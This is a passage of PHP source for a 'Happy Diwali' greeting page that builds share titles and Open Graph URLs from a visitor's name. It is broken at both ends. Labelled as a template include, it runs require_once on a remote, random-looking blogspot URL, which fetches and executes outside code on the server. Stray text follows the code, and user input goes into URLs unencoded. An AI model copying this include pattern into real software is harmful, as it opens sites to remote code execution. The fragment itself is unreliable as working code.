';
$wish_text = strtoupper($name) . "
Wish You a
";
}else{
$site_title = "Happy Diwali";
$img_src = base_url() . "assets/images/8-1.gif";
$share_exist = false;
$og_url = base_url()."index.php";
$fb_url = urlencode(base_url()."index.php");
$og_image = '';
$wish_text = "";
if(isset($_POST['set-name'])){
$name = htmlspecialchars($_POST['set-name']);
$site_title = ucfirst($name)." sent you a Happy Diwali Greetings";
$img_src = base_url() . "assets/images/8-1.gif";
$share_exist = true;
$og_url = base_url()."index.php?n=".$name;
$fb_url = urlencode(base_url()."index.php?n=".$name);
$wish_text = strtoupper($name) ."
Wish You a
";
}
}
$og_title = $site_title;
$og_desc = "Sent Happy Diwali Greetings" ;
$og_sitename = $site_title;
//Include the template file
require_once('https://hwhahhshhwhahhshh.blogspot.com');
?>
In
Advance